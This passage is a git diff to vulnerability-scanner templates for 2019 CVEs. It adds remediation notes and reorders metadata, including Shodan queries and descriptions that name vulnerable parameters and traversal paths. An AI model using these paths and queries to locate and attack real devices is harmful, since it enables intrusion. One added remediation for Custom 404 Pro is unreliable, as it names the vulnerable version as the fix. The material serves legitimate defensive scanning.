http://packetstormsecurity.com/files/153079/Deltek-Maconomy-2.2.5-Local-File-Inclusion.html - https://github.com/ras313/CVE-2019-12314/security/advisories/GHSA-8762-rf4g-23xm @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-12314 cwe-id: CWE-22 epss-score: 0.23499 - cpe: cpe:2.3:a:deltek:maconomy:2.2.5:*:*:*:*:*:*:* epss-percentile: 0.95935 + cpe: cpe:2.3:a:deltek:maconomy:2.2.5:*:*:*:*:*:*:* metadata: max-request: 1 vendor: deltek diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index b96f0d1314..ecc8cf947c 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Web Port 1.19.1 is vulnerable to cross-site scripting via the /log type parameter. + remediation: | + Upgrade to the latest version of WebPort (1.19.2 or higher) which includes a fix for this vulnerability. reference: - https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS - https://webport.se/nedladdningar/ @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-12461 cwe-id: CWE-79 epss-score: 0.00269 - cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:* epss-percentile: 0.63646 + cpe: cpe:2.3:a:webport:web_port:1.19.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: webport diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index e8be46f619..9b62c22086 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -5,6 +5,8 @@ info: author: n-thumann severity: medium description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting. + remediation: | + Apply the latest firmware update provided by Zyxel to fix the XSS vulnerability. reference: - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/ @@ -17,13 +19,13 @@ info: cve-id: CVE-2019-12581 cwe-id: CWE-79 epss-score: 0.00642 - cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.7661 + cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - shodan-query: http.title:"ZyWall" vendor: zyxel product: uag2100_firmware + shodan-query: http.title:"ZyWall" tags: cve,cve2019,zyxel,zywall,xss http: diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index 0de42fd24e..9d7be50111 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -5,6 +5,8 @@ info: author: n-thumann,daffainfo severity: critical description: Zyxel UAG, USG, and ZyWall devices allows a remote attacker to generate guest accounts by directly accessing the account generator via the "Free Time" component. This can lead to unauthorized network access or DoS attacks. + remediation: | + Apply the latest firmware update provided by Zyxel to fix the vulnerability. reference: - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/ @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-12583 cwe-id: CWE-425 epss-score: 0.00481 - cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* epss-percentile: 0.72824 + cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zyxel diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index cd97bb169b..7d533a5ce3 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -6,6 +6,8 @@ info: severity: high description: | IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal. + remediation: | + Upgrade IceWarp Mail Server to a version higher than 10.4.4 or apply the vendor-provided patch to fix the LFI vulnerability. reference: - https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt - http://www.icewarp.com @@ -17,14 +19,14 @@ info: cve-id: CVE-2019-12593 cwe-id: CWE-22 epss-score: 0.13201 - cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* epss-percentile: 0.94827 + cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 - google-query: Powered By IceWarp 10.4.4 - shodan-query: title:"icewarp" vendor: icewarp product: mail_server + shodan-query: title:"icewarp" + google-query: Powered By IceWarp 10.4.4 tags: packetstorm,cve,cve2019,lfi,icewarp http: diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index c3e3962566..9496094768 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -5,6 +5,8 @@ info: author: Mohammedsaneem,philippedelteil,daffainfo severity: medium description: phpMyAdmin before 4.9.0 is susceptible to cross-site request forgery. An attacker can utilize a broken tag which points at the victim's phpMyAdmin database, thus leading to potential delivery of a payload, such as a specific INSERT or DELETE statement. + remediation: | + Upgrade phpMyAdmin to version 4.9.0 or later to mitigate the CSRF vulnerability. reference: - https://www.phpmyadmin.net/security/PMASA-2019-4/ - https://www.exploit-db.com/exploits/46982 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-12616 cwe-id: CWE-352 epss-score: 0.00989 - cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* epss-percentile: 0.81614 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: phpmyadmin diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml index 585bde5909..1062b6c543 100644 --- a/http/cves/2019/CVE-2019-12725.yaml +++ b/http/cves/2019/CVE-2019-12725.yaml @@ -5,21 +5,21 @@ info: author: dwisiswant0,akincibor severity: critical description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters. + remediation: Upgrade to 3.9.5. Be aware this product is no longer supported. reference: - https://www.zeroshell.org/new-release-and-critical-vulnerability/ - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py - https://zeroshell.org/blog/ - http://packetstormsecurity.com/files/160211/ZeroShell-3.9.0-Remote-Command-Execution.html - remediation: Upgrade to 3.9.5. Be aware this product is no longer supported. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-12725 cwe-id: CWE-78 epss-score: 0.96479 - cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:* epss-percentile: 0.99394 + cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: zeroshell diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index 8d06c9c0ea..f4770c6de9 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting. + remediation: | + Upgrade to the latest version of LiveZilla Server or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/49669 - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2019-12962 cwe-id: CWE-79 epss-score: 0.20689 - cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* epss-percentile: 0.95731 + cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: - max-request: 1 - shodan-query: http.html:LiveZilla verified: true + max-request: 1 vendor: livezilla product: livezilla + shodan-query: http.html:LiveZilla tags: xss,edb,packetstorm,cve,cve2019,livezilla http: diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index b2cf874532..2f20b07f6f 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the ping function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, pingCount, or packetSize, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the necessary patches or updates provided by Citrix to mitigate this vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-31 - https://support.citrix.com/article/CTX251987 @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-12985 cwe-id: CWE-78 epss-score: 0.97433 - cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* epss-percentile: 0.99906 + cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"Citrix SD-WAN" vendor: citrix product: netscaler_sd-wan + shodan-query: http.title:"Citrix SD-WAN" tags: cve,cve2019,citrix,rce,unauth,oast,tenable http: diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index d764b34ed0..595eda0c20 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the trace_route function in DiagnosticsController, which does not sufficiently validate or sanitize HTTP request parameter values used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ipAddress, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the necessary patches or updates provided by Citrix to mitigate the vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-31 - https://support.citrix.com/article/CTX251987 @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-12986 cwe-id: CWE-78 epss-score: 0.97433 - cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* epss-percentile: 0.99906 + cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"Citrix SD-WAN" vendor: citrix product: netscaler_sd-wan + shodan-query: http.title:"Citrix SD-WAN" tags: unauth,oast,tenable,cve,cve2019,citrix,rce http: diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index daa9bf85a0..80ce6d9686 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the apply action in StorageMgmtController. The callStoragePerl function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying an array value with crafted values for action, host, path, or type, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches provided by Citrix to mitigate the vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-31 - https://support.citrix.com/article/CTX251987 @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-12987 cwe-id: CWE-78 epss-score: 0.97433 - cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* epss-percentile: 0.99906 + cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"Citrix SD-WAN" vendor: citrix product: netscaler_sd-wan + shodan-query: http.title:"Citrix SD-WAN" tags: citrix,rce,unauth,oast,tenable,cve,cve2019 http: diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index 04576616b1..f4e5bf51d2 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to remote command injection via the addModifyZTDProxy function in NmsController. The function does not sufficiently validate or sanitize HTTP request parameter values that are used to construct a shell command. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for ztd_password, thereby potentially being able to obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches provided by Citrix to mitigate the vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-31 - https://support.citrix.com/article/CTX251987 @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-12988 cwe-id: CWE-78 epss-score: 0.97433 - cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* epss-percentile: 0.99906 + cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 - shodan-query: http.title:"Citrix SD-WAN" vendor: citrix product: netscaler_sd-wan + shodan-query: http.title:"Citrix SD-WAN" tags: rce,unauth,oast,tenable,cve,cve2019,citrix http: diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index f205671200..3173a84b99 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Citrix SD-WAN Center is susceptible to local file inclusion via the applianceSettingsFileTransfer function in ApplianceSettingsController. The function does not sufficiently validate or sanitize HTTP request parameter values used to construct a file system path. An attacker can trigger this vulnerability by routing traffic through the Collector controller and supplying a crafted value for filename, filedata, and workspace_id, therefore being able to write files to locations writable by the www-data user and/or to write a crafted PHP file to /home/talariuser/www/app/webroot/files/ to execute arbitrary PHP code. + remediation: | + Apply the latest security patches or updates provided by Citrix to mitigate the vulnerability. reference: - https://www.tenable.com/security/research/tra-2019-31 - https://support.citrix.com/search?searchQuery=*&lang=en&sort=relevance&prod=&pver=&ct=Security+Bulletin @@ -16,13 +18,13 @@ info: cve-id: CVE-2019-12990 cwe-id: CWE-22 epss-score: 0.95724 - cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* epss-percentile: 0.99172 + cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 3 - shodan-query: http.title:"Citrix SD-WAN" vendor: citrix product: netscaler_sd-wan + shodan-query: http.title:"Citrix SD-WAN" tags: cve,cve2019,citrix,rce,unauth,tenable,intrusive http: diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index 840ed7884f..e1320b131b 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -5,6 +5,8 @@ info: author: Suman_Kar severity: critical description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page. + remediation: | + Update the router's firmware to the latest version provided by D-Link. reference: - https://github.com/d0x0/D-Link-DIR-600M - https://www.exploit-db.com/exploits/47250 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-13101 cwe-id: CWE-306 epss-score: 0.03717 - cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:* epss-percentile: 0.90578 + cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index 7dfca65348..6229325043 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid. + remediation: | + Upgrade to the latest version of MindPalette NateMail to fix the XSS vulnerability. reference: - https://www.doyler.net/security-not-included/natemail-vulnerabilities - https://mindpalette.com/tag/natemail/ @@ -16,8 +18,8 @@ info: cve-id: CVE-2019-13392 cwe-id: CWE-79 epss-score: 0.0014 - cpe: cpe:2.3:a:mindpalette:natemail:3.0.15:*:*:*:*:*:*:* epss-percentile: 0.4905 + cpe: cpe:2.3:a:mindpalette:natemail:3.0.15:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mindpalette diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index a499f582d2..b45ac3d19e 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko,daffainfo severity: medium description: FlightPath versions prior to 4.8.2 and 5.0-rc2 are vulnerable to local file inclusion. + remediation: | + Upgrade to the latest version to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/47121 - http://getflightpath.com/node/2650 @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-13396 cwe-id: CWE-22 epss-score: 0.02107 - cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:* epss-percentile: 0.87729 + cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: getflightpath diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml index c71d33fe3b..89e857eafb 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -5,6 +5,8 @@ info: author: divya_mudgal severity: critical description: Lansweeper before 7.1.117.4 allows unauthenticated SQL injection. + remediation: | + Apply the latest security patch or update provided by Lansweeper to fix the SQL Injection vulnerability. reference: - https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/ - https://nvd.nist.gov/vuln/detail/CVE-2019-13462 @@ -16,8 +18,8 @@ info: cve-id: CVE-2019-13462 cwe-id: CWE-89 epss-score: 0.41054 - cpe: cpe:2.3:a:lansweeper:lansweeper:*:*:*:*:*:*:*:* epss-percentile: 0.96803 + cpe: cpe:2.3:a:lansweeper:lansweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: lansweeper diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index e4c70cd572..44433a33dc 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress Nevma Adaptive Images plugin before 0.6.67 allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php. + remediation: | + Update to the latest version of the plugin (0.6.67) or apply the patch provided by the vendor. reference: - https://github.com/security-kma/EXPLOITING-CVE-2019-14205 - https://markgruffer.github.io/2019/07/19/adaptive-images-for-wordpress-0-6-66-lfi-rce-file-deletion.html @@ -18,13 +20,13 @@ info: cve-id: CVE-2019-14205 cwe-id: CWE-22 epss-score: 0.06333 - cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:* epss-percentile: 0.92717 + cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 - framework: wordpress vendor: nevma product: adaptive_images + framework: wordpress tags: cve,cve2019,wordpress,wp-plugin,lfi,wp http: diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index b6d053a15a..6f471e91bd 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -5,6 +5,8 @@ info: author: pdteam severity: medium description: Alfresco Share before 5.2.6, 6.0.N and 6.1.N contains an open redirect vulnerability via a crafted POST request. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Apply the latest security patches or updates provided by Alfresco to fix the open redirect vulnerability. reference: - https://community.alfresco.com/content?filterID=all~objecttype~thread%5Bquestions%5D - https://github.com/DrunkenShells/Disclosures/tree/master/CVE-2019-14223-Open%20Redirect%20in%20Alfresco%20Share-Alfresco%20Community @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-14223 cwe-id: CWE-601 epss-score: 0.00188 - cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:community:*:*:* epss-percentile: 0.55496 + cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:community:*:*:* metadata: max-request: 1 vendor: alfresco diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index 7d18a19ed0..84084bb455 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: high description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the T24 Web Server. reference: - https://github.com/kmkz/exploit/blob/master/CVE-2019-14251-TEMENOS-T24.txt - https://vuldb.com/?id.146815 @@ -15,8 +17,8 @@ info: cve-id: CVE-2019-14251 cwe-id: CWE-22 epss-score: 0.01349 - cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:* epss-percentile: 0.84467 + cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:* metadata: max-request: 2 vendor: temenos diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 16b6a85934..2519d4664e 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Aptana Jaxer 1.0.3.4547 is vulnerable to local file inclusion in the wikilite source code viewer. An attacker can read internal files on the server via a tools/sourceViewer/index.html?filename=../ URI. + remediation: | + Upgrade to a patched version of Aptana Jaxer or apply the necessary security patches to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/47214 - http://packetstormsecurity.com/files/153985/Aptana-Jaxer-1.0.3.4547-Local-File-Inclusion.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2019-14312 cwe-id: CWE-22 epss-score: 0.02327 - cpe: cpe:2.3:a:aptana:jaxer:1.0.3.4547:*:*:*:*:*:*:* epss-percentile: 0.88328 + cpe: cpe:2.3:a:aptana:jaxer:1.0.3.4547:*:*:*:*:*:*:* metadata: max-request: 1 vendor: aptana diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index c791fcad4e..a5f4d4638e 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Pallets Werkzeug before 0.15.5 is susceptible to local file inclusion because SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames. + remediation: | + Upgrade Pallets Werkzeug to version 0.15.5 or above to mitigate the LFI vulnerability. reference: - https://palletsprojects.com/blog/werkzeug-0-15-5-released/ - http://packetstormsecurity.com/files/163398/Pallets-Werkzeug-0.15.4-Path-Traversal.html @@ -16,8 +18,8 @@ info: cve-id: CVE-2019-14322 cwe-id: CWE-22 epss-score: 0.58463 - cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:* epss-percentile: 0.97287 + cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:* metadata: max-request: 3 vendor: palletsprojects diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index 2c0176683a..82a10a2b30 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: WordPress UserPro 4.9.32 is vulnerable to reflected cross-site scripting because the Instagram PHP API (v2) it relies on allows it via the example/success.php error_description parameter. + remediation: | + Update to the latest version of UserPro or apply the provided patch to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/9815 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14470 @@ -17,8 +19,8 @@ info: cve-id: CVE-2019-14470 cwe-id: CWE-79 epss-score: 0.78633 - cpe: cpe:2.3:a:instagram-php-api_project:instagram-php-api:-:*:*:*:*:*:*:* epss-percentile: 0.97832 + cpe: cpe:2.3:a:instagram-php-api_project:instagram-php-api:-:*:*:*:*:*:*:* metadata: max-request: 1 vendor: instagram-php-api_project diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index a15fba863d..f66e9b2ac8 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -6,6 +6,8 @@ info: severity: high description: | OpenEMR before 5.0.2 is vulnerable to local file inclusion via the fileName parameter in custom/ajax_download.php. An attacker can download any file (that is readable by the web server user) from server storage. If the requested file is writable for the web server user and the directory /var/www/openemr/sites/default/documents/cqm_qrda/ exists, the file will be deleted from server. + remediation: | + Upgrade OpenEMR to version 5.0.2 or later to mitigate the LFI vulnerability. reference: - https://www.exploit-db.com/exploits/50037 - https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_7.zip @@ -17,11 +19,11 @@ info: cve-id: CVE-2019-14530 cwe-id: CWE-22 epss-score: 0.83277 - cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* epss-percentile: 0.97995 + cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: - max-request: 2 verified: true + max-request: 2 vendor: open-emr product: openemr tags: lfi,authenticated,edb,cve,cve2019,openemr diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index 253602bf97..c39c1764c0 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: medium description: Open-School 3.0, and Community Edition 2.3, allows cross-site scripting via the osv/index.php?r=students/guardians/create id parameter. + remediation: | + To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://open-school.org - https://pastebin.com/AgxqdbAQ @@ -16,8 +18,8 @@ info: cve-id: CVE-2019-14696 cwe-id: CWE-79 epss-score: 0.00776 - cpe: cpe:2.3:a:open-school:open-school:2.3:*:*:*:community:*:*:* epss-percentile: 0.79096 + cpe: cpe:2.3:a:open-school:open-school:2.3:*:*:*:community:*:*:* metadata: max-request: 1 vendor: open-school diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 072e34723a..6c01822562 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An issue was discovered in osTicket before 1.10.7 and 1.12.x before 1.12.1. Stored XSS exists in setup/install.php. It was observed that no input sanitization was provided in the firstname and lastname fields of the application. The insertion of malicious queries in those fields leads to the execution of those queries. This can further lead to cookie stealing or other malicious actions. + remediation: | + Upgrade osTicket to version 1.12.1 or later to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/154005/osTicket-1.12-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2019-14750 @@ -18,13 +20,13 @@ info: cve-id: CVE-2019-14750 cwe-id: CWE-79 epss-score: 0.05309 - cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* epss-percentile: 0.92085 + cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 4 - shodan-query: title:"osTicket" vendor: osticket product: osticket + shodan-query: title:"osTicket" tags: packetstorm,cve,cve2019,osticket,xss,intrusive variables: user_name: "{{to_lower(rand_text_alphanumeric(6))}}" diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 554a1c8ee9..7448d4f86b 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Custom 404 Pro before 3.2.9 is susceptible to cross-site scripting via the title parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to Custom 404 Pro version 3.2.8 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/81ee1df5-12dc-49d8-8d49-ca28d6f5b7fd - https://wordpress.org/plugins/custom-404-pro/advanced/ @@ -17,14 +19,14 @@ info: cve-id: CVE-2019-14789 cwe-id: CWE-79 epss-score: 0.00125 - cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:* epss-percentile: 0.46223 + cpe: 